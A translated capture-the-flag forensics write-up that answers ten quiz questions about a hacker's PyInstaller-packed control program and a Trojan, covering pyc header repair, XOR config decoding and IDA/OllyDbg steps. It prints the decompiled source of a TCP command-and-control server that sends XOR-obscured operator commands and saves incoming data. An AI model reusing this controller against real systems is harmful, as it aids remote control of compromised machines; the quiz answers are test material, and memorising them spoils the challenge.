Pangushi Final Binary Program Analysis
1. Analyze the hacker's computer: what transport protocol does the control program use? [Answer format: http]
tcp
The control program can be found directly on the hacker's D: drive.
At a glance it looks like a PyInstaller-packed Python program.
python pyinstxtractor.py control end.exe
In general, an exe built from Python is unpacked with pyinstxtractor.py as above.
This produces a folder in which serve is the pyc file we want, but at this stage you cannot simply rename it with a .pyc extension: the file will fail to decompile.
The reason is that the version-specific pyc file header is missing (as shown below).
Because the header differs between Python versions, you cannot simply copy one from a local .pyc, which is annoying.
So where is the header of this file?
here
Compare the position of the E3 byte (the marker of the marshalled code object).
We can see that the 4-byte magic number is 55 0D 0D 0A.
Only these 4 bytes carry the version, but a full 16-byte header must be prepended so that the E3 byte lands at the same offset as in a normal .pyc.
At this point the file can be decompiled
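To show the header repair step in code, here is an added example that is not part of the write-up: it builds the 16-byte header, prepends it to a headerless marshalled code object, and checks that the code-object marker lands at offset 16. The 3.8 magic 55 0D 0D 0A is the value from the page; the demo uses the running interpreter's own magic so the result can be loaded locally, and the constructed sample script and the function names are my own assumptions.

```python
import importlib.util
import marshal
import struct

# Magic number of CPython 3.8 bytecode (3413 = 0x0D55 little-endian, then b"\r\n"),
# matching the 55 0D 0D 0A seen in the write-up.
MAGIC_38 = b"\x55\x0d\x0d\x0a"
# Python 3.7+ pyc header: magic(4) + flags(4) + mtime(4) + source size(4)
HEADER_LEN = 16
TYPE_CODE = ord("c")   # marshal type byte of a code object; 0xE3 is 'c' | FLAG_REF (0x80)


def build_pyc_header(magic=MAGIC_38, flags=0, mtime=0, size=0):
    """Return a 16-byte pyc header; zero flags/mtime/size are fine for decompilers."""
    if len(magic) != 4:
        raise ValueError("magic must be 4 bytes")
    return magic + struct.pack("<III", flags, mtime, size)


def is_code_marker(b):
    """True for the marshal marker of a code object, with or without FLAG_REF (0x63 or 0xE3)."""
    return (b & 0x7F) == TYPE_CODE


def repair_pyc(headerless, magic=MAGIC_38):
    """Prepend a full header so the marshalled code object starts at offset 16, as in a real .pyc."""
    if not headerless or not is_code_marker(headerless[0]):
        raise ValueError("input does not start with a marshalled code object")
    return build_pyc_header(magic) + headerless


def code_object_offset(pyc):
    """Offset of the code-object marker in a repaired file; -1 if it is not where a .pyc puts it."""
    if len(pyc) > HEADER_LEN and is_code_marker(pyc[HEADER_LEN]):
        return HEADER_LEN
    return -1


def load_repaired(pyc):
    """Verify a repaired file with the running interpreter: magic must match, then unmarshal the body."""
    if pyc[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("magic does not match this interpreter; load it with the matching Python")
    return marshal.loads(pyc[HEADER_LEN:])


def demo():
    """Constructed sample: take the headerless body of a freshly compiled script, repair it, run it."""
    src = "def greet(name):\n    return 'hello ' + name\n"
    code = compile(src, "serve.py", "exec")
    headerless = marshal.dumps(code)          # this is what an extracted PYZ entry looks like
    repaired = repair_pyc(headerless, importlib.util.MAGIC_NUMBER)
    namespace = {}
    exec(load_repaired(repaired), namespace)
    return code_object_offset(repaired), namespace["greet"]("analyst")


if __name__ == "__main__":
    print(demo())
```

For the real serve file you would call repair_pyc(open_bytes, MAGIC_38) and feed the result to a decompiler running under Python 3.8; the load_repaired check is there so that a wrong magic is caught before you waste time on a decompiler error.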
Usually the following decompilation method is used:
However, uncompyle6.exe only supports Python 3.8 and below.
So if you are online, search for an online decompiler or use pycdc.
The results are mediocre, so let's take a detour.
The bytecode disassembly itself is fine,
so use GPT to restore the source bit by bit.
It may not be fully accurate, but it is readable.
# uncompyle6 version 3.8.0
# Python bytecode 3.8.0 (3413)
# Decompiled from: Python 3.7.4 (tags/v3.7.4:e09359112e, Jul 8 2019, 20:34:20) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: server.py
import socket, json


def decrypt_config():
    # Read config.txt byte by byte, XOR each byte with 41, and parse the result as JSON.
    data_str = ''
    with open('config.txt', 'rb') as f:
        byte = f.read(1)
        byte_to_int = int.from_bytes(byte, byteorder='big')
        data = byte_to_int ^ 41
        dataB = data.to_bytes(1, byteorder='big')
        data_str += dataB.decode()
        while byte:
            byte = f.read(1)
            if byte:
                byte_to_int = int.from_bytes(byte, byteorder='big')
                data = byte_to_int ^ 41
                dataB = data.to_bytes(1, byteorder='big')
                data_str += dataB.decode()
    data_dict = json.loads(data_str)
    return (data_dict['address'], data_dict['port'])


def input_data() -> bytes:
    # Prompt the operator for a command and encrypt it before sending.
    data = input('Please enter the command')
    data = Crypt_data(data)
    return data.encode()


def Crypt_data(data) -> str:
    # XOR every byte with 'p' (0x70); the same routine encrypts outgoing commands
    # and decrypts incoming data. Returns str if the result decodes, else bytes.
    if isinstance(data, str):
        data = data.encode('utf-8')
    temp = b''
    for i in data:
        data_int = i ^ int.from_bytes(b'p', byteorder='big')
        data_bytes = data_int.to_bytes(1, byteorder='big')
        temp += data_bytes
    try:
        temp = temp.decode()
    except Exception:
        temp = temp
    return temp


def deal(data: bytes):
    # Write received payload data to disk (the file name did not survive decompilation).
    with open('?.txt', 'wb+') as f:
        f.write(data)


class connect:
    def __init__(self):
        self.address = decrypt_config()

    def tcpServer(self):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.bind(self.address)
            s.listen(10)
            while True:
                conn, addr = s.accept()
                conn.setblocking(0)
                while True:
                    try:
                        data = conn.recv(1000000)
                        data = Crypt_data(data)
                    except BlockingIOError as e:
                        try:
                            data = b''
                        finally:
                            e = None
                            del e
                    else:
                        print(data)
                    if not data == '2a':
                        if data == 'ok':
                            send_data = input_data()
                            conn.send(send_data)
                        else:
                            if data == 'er':
                                print('!!!! Operation failed, please try again!!!!')
                                send_data = input_data()
                                conn.send(send_data)
                    if data == 'end':
                        continue
                    elif data == b'':
                        continue
                    else:
                        deal(data)


if __name__ == '__main__':
    con = connect()
    con.tcpServer()
# okay decompiling server.pyc
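As an added example that is not the server's own code, here is a cleaner decoder for the two single-byte XOR layers seen above, written from the analyst's side: it recovers address and port from an encrypted config.txt, decodes a captured command-channel frame, and classifies it the way tcpServer's branches do. The keys 41 and 'p' come from the decompiled code; the sample config, the sample frame and the 10.0.0.5:4444 values are constructed, and the function names are my own.

```python
import json

CONFIG_KEY = 41          # key decrypt_config() applies to config.txt
COMMAND_KEY = ord("p")   # 0x70, key Crypt_data() applies to the command channel
STATUS_COMMANDS = ("ok", "er", "end", "2a")   # the string branches in tcpServer()


def xor_bytes(data, key):
    """Single-byte XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def looks_like_config(blob):
    """Triage check for a disk image: the JSON config starts with '{',
    so the encrypted file always starts with 0x7B ^ 41 = 0x52 ('R')."""
    return len(blob) > 0 and blob[0] == (ord("{") ^ CONFIG_KEY)


def decode_config(blob):
    """Recover (address, port) from an encrypted config.txt blob."""
    cfg = json.loads(xor_bytes(blob, CONFIG_KEY).decode("utf-8"))
    return cfg["address"], cfg["port"]


def decode_command(frame):
    """Decode one frame: str when it is valid UTF-8, otherwise the raw bytes (as Crypt_data does)."""
    plain = xor_bytes(frame, COMMAND_KEY)
    try:
        return plain.decode("utf-8")
    except UnicodeDecodeError:
        return plain


def classify(frame):
    """Which tcpServer() branch a captured frame would take."""
    msg = decode_command(frame)
    if msg in (b"", ""):
        return "empty"
    if msg in STATUS_COMMANDS:
        return "status:" + msg
    return "payload"   # everything else is written to disk by deal()


# Constructed samples, not data from the case
SAMPLE_CONFIG = xor_bytes(json.dumps({"address": "10.0.0.5", "port": 4444}).encode(), CONFIG_KEY)
SAMPLE_FRAME = xor_bytes(b"ok", COMMAND_KEY)

if __name__ == "__main__":
    print(looks_like_config(SAMPLE_CONFIG), decode_config(SAMPLE_CONFIG), classify(SAMPLE_FRAME))
```

The looks_like_config check is the useful part for a forensic sweep: a single-byte XOR keeps the first byte of the plaintext predictable, so every file that starts with 0x52 is a candidate config worth decoding.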
In the end a few parts could not be recovered, but that is fine;
the server uses socket.SOCK_STREAM, and GPT also said it is obviously TCP.
2. Analyze the hacker's computer: what is the size of the receive buffer of the control program? [Answer format: 100]
1000000
Nothing to explain: it is the argument to conn.recv().
3. Analyze the hacker's computer: how many commands does the control program receive and check? [Answer format: 1]
5
Five; note that two of them are the same.
4. Analyze the hacker's computer: which command ends the control program's connection? [Answer format: xxx]
end
There are two branches that terminate the loop; the command is named end.
5. Analyze the hacker's computer: what is the decryption function for the control program's configuration file? [Answer format: x_x]
decrypt_config
It can be identified from the function name and body.
6. Analyze the hacker's Trojan program: what is the IP address of the program's control end? [Answer format: 127.0.0.1]
192.168.100.141
It is not packed, so open it in IDA first.
But the address could not be found in IDA.
Since the program has the address, it must send to it at some point.
So just step through it blindly in OllyDbg.
It took only a few steps to succeed.
7. Analyze the hacker's Trojan program: the program calls the Sleep function at address 0x00410CA4. How many seconds does the call pause? [Answer format: 3]
5
Press G to jump directly to the address.
Press F5 to decompile.
Right-click and change the number format.
5000 ms is 5 seconds.
8. Analyze the hacker's Trojan program: there are two pictures under the program's "png" resource type. What is the MD5 of the picture used as the program icon? [Answer format: lowercase letters]
ae755aad5abaa7926a691a5d94e84ea2
Open it with a resource viewer.
Just save the image and compute its hash.
9. Analyze the hacker's Trojan program: which function directly references the HOST resource? [Answer format: sub__1234]
sub_405570
Search for it in the strings window (Shift+F12), then view cross-references (Ctrl+X).
Two references are found.
You can see that the first function loads the resource.
10. Analyze the hacker's Trojan program: which antivirus software does this program bypass? [Answer format: Tencent]
Jinshan
Just search the strings for "kill" directly.
This exe belongs to Jinshan antivirus.